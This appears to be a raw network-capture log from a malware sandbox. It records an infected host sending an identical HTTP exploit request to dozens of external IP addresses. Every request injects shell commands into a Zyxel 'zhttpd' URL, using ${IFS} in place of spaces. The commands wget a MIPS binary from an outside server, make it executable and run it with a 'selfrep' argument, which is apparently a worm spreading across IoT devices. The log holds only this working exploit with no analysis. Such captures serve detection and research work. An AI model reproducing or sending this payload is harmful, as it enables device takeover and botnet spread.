                                          Jan 14, 2024 15:46:26.223701000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6815192.168.2.2360100122.246.111.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223723888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6816192.168.2.235744280.108.103.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223747015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6817192.168.2.236055417.41.66.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223788023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6818192.168.2.235055824.99.105.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223807096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6819192.168.2.2333770161.177.80.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223812103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6820192.168.2.2350466106.15.175.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223829031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6821192.168.2.2349718135.212.34.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223859072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6822192.168.2.2336744147.69.6.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223920107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6823192.168.2.233671887.127.171.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223937035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6824192.168.2.234953088.235.193.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223958015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6825192.168.2.2357178143.155.38.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223978996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6826192.168.2.234689683.62.240.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.223988056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6827192.168.2.234716638.206.56.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224018097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6828192.168.2.234860489.42.108.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224062920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6829192.168.2.234925892.141.248.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224086046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6830192.168.2.2339658202.7.3.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224096060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6831192.168.2.234897284.230.56.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224129915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6832192.168.2.2351512107.235.1.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224131107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6833192.168.2.2349678177.5.226.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224172115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6834192.168.2.235744839.173.7.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224195004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6835192.168.2.235059412.148.24.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224224091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6836192.168.2.2352504169.72.55.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224251986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6837192.168.2.235065217.106.234.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224267006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6838192.168.2.2359256217.175.0.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224298954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6839192.168.2.234824666.143.113.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224344015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6840192.168.2.235584250.109.222.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224368095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6841192.168.2.2343090124.139.255.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224396944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6842192.168.2.2355054183.43.62.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224426031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6843192.168.2.2359040103.121.152.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224455118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6844192.168.2.2333186151.67.235.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224467993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6845192.168.2.2340798111.170.135.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224492073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6846192.168.2.2336658200.0.186.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224528074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6847192.168.2.233613217.47.235.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224553108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6848192.168.2.2343506176.38.170.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224576950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6849192.168.2.233472673.253.151.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224586964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6850192.168.2.234756239.51.5.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224651098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6851192.168.2.2336612205.91.52.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224669933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6852192.168.2.2340928185.25.196.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224699974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6853192.168.2.2340772198.212.228.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224730015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6854192.168.2.234831638.27.27.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224740028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6855192.168.2.2347028178.139.60.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224786043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6856192.168.2.234765693.188.244.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224812031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6857192.168.2.2350658207.83.126.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224822998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6858192.168.2.235603057.58.111.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224845886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6859192.168.2.233651697.232.251.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224880934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6860192.168.2.2350894137.14.220.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224911928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6861192.168.2.2340390144.8.28.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224953890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6862192.168.2.234005062.195.171.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.224980116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6863192.168.2.2334386194.166.235.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225013971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6864192.168.2.234242646.38.250.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225043058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6865192.168.2.234377062.8.225.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225044012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6866192.168.2.2334658221.241.56.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225092888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6867192.168.2.2347136191.181.35.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225142002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6868192.168.2.2345830116.238.213.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225167990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6869192.168.2.2360162201.249.22.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225193024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6870192.168.2.2351742223.22.208.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225214005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6871192.168.2.23357145.233.222.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225224972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6872192.168.2.234990832.39.9.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225248098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6873192.168.2.2341308103.245.126.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225275993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6874192.168.2.2337770109.250.164.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225306988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6875192.168.2.2346180196.109.79.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225332975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6876192.168.2.2336564166.164.32.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225363016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6877192.168.2.2336108166.23.35.36443
                                          TimestampBytes transferredDirectionData
